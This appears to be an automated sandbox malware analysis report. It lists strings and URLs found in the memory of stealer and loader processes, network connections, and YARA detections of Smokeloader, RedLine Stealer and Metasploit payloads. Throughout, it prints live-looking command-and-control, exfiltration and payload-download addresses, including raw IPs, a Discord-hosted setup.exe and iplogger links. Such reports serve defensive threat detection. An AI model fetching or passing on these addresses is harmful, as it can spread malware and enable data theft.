Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/-
Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/en-GB
Source: playglock32x64.exe, 0000000D.00000002.2683340314.0000000003580000.00000004.00000020.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000002.2679705676.00000000008C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86e8908
Source: playglock32x64.exe, 0000000D.00000002.2679705676.00000000008B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.208.158.248/search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82d
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690856967.0000000004382000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121%
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121;
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194.58.114.223/d/385121C:
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/=
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1690067906.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.php
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.php3
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpH
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpR
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpT
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpr
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phprN
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-admin.phpy
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.phpA
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/api/wp-ping.phpU
Source: RegAsm.exe, 00000003.00000002.1688734412.0000000001107000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135/l
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.phpU
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-admin.phpd
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000111D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.91.200.135:80/api/wp-ping.php
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBF
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/add?substr=mixnine&s=three&sub=NOSUBI
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003F80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixnine
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixnineC:
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixninee
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dl?name=mixninelVz0BoyeRjU78
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/key
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/dll/key/
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/files/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/name
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/namel
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2102544836.000000000055A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/soft/download
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000002.2103324889.0000000002B50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.66.75.114/soft/downloadKR
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000002.2680714464.0000000005C54000.00000004.00001000.00020000.00000000.sdmp, playglock32x64.exe, 0000000D.00000000.1610946241.0000000000638000.00000002.00000001.01000000.00000010.sdmp, playglock32x64.exe, 0000000D.00000003.1613682541.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://acritum.com/ocb/
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1693465597.0000000001552000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fivevh5pt.top/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1691472183.0000000001569000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fivevh5pt.top/v1/upload.php
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exe
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exeC:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://marafon.in/dergrherg/setup1.exexe
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ocsp.thawte.com0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://s.symcd.com06
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.innosetup.com/
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: http://www.openssl.org/f
Source: is-5ANFC.tmp.11.dr String found in binary or memory: http://www.openssl.org/support/faq.html
Source: hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1572629914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1587610572.0000000002178000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1572629914.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.exe, 00000007.00000003.1587610572.0000000002178000.00000004.00001000.00020000.00000000.sdmp, hI6pMK6rYY2urO_lpGyU85DA.tmp, 0000000B.00000000.1595851953.0000000000401000.00000020.00000001.01000000.0000000C.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1687419354.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp, CheckTool[1].exe.3.dr String found in binary or memory: https://api.midtrans.comGetUserDefaultLocaleNameinvalid
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1762556798.0000000000CAA000.00000002.00000001.01000000.0000000A.sdmp, CheckTool[1].exe.3.dr String found in binary or memory: https://api.sandbox.midtrans.comcrypto/aes:
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000010DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=jsonb
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/6
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachmtachm
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://d.symcb.com/rpa0.
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://g-cleanit.hk
Source: IZImiIFXXrvtVOHFozZW.dll.6.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.00000000026B1000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/api
Source: BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ghostreedmnu.shop/m
Source: RegAsm.exe String found in binary or memory: https://ipgeolocation.io/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/(
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/R)dn
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1687419354.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33Z
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/
Source: RegAsm.exe, 00000003.00000002.1688734412.00000000011B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/%M
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/1S3fd7
Source: RegAsm.exe, 00000003.00000002.1688734412.000000000113C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/1S3fd7&
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co/p
Source: RegAsm.exe, 00000003.00000002.1690067906.0000000003FA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplog.co:443/1S3fd7S
Source: tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053622076.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052522216.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2052810858.000000000305D000.00000004.00000020.00020000.00000000.sdmp, tyq3dazbB0crObgKIDGLxiAO.exe, 00000009.00000003.2053688783.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1Pz8p7
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000000.1571265793.00000000013E2000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://serviceupdate32.com/update
Source: is-O04L0.tmp.11.dr, is-5ANFC.tmp.11.dr String found in binary or memory: https://www.certum.pl/CPS0
Source: BitLockerToGo.exe, 00000032.00000003.1768734098.000000000270A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000002.1779130970.0000000002692000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000032.00000003.1768734098.000000000270A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000032.00000003.1768755104.00000000026B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749077248.00000000036B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49726 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands
barindex
Yara detected Neoreklami
Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2102908522.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000002.2102510892.00000000004AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.1766538879.000000000198E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.1766830141.0000000001B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
.NET source code contains very large array initializations
Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 1947136
Drops large PE files
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File dump: service123.exe.6.dr 314617856 Jump to dropped file
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042CC00 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv, 3_2_0042CC00
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042F530 NtdllDefWindowProc_A, 11_2_0042F530
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00423B94 NtdllDefWindowProc_A, 11_2_00423B94
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004125E8 NtdllDefWindowProc_A, 11_2_004125E8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004789DC NtdllDefWindowProc_A, 11_2_004789DC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 11_2_004573CC
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 11_2_0042E944
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 11_2_004555D0
Creates files inside the system directory
Source: C:\Windows\SysWOW64\schtasks.exe File created: C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00427140 3_2_00427140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00436570 3_2_00436570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0042C520 3_2_0042C520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004305F0 3_2_004305F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0046D580 3_2_0046D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00431690 3_2_00431690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004516A0 3_2_004516A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00442810 3_2_00442810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004379C0 3_2_004379C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004349D0 3_2_004349D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00433A90 3_2_00433A90
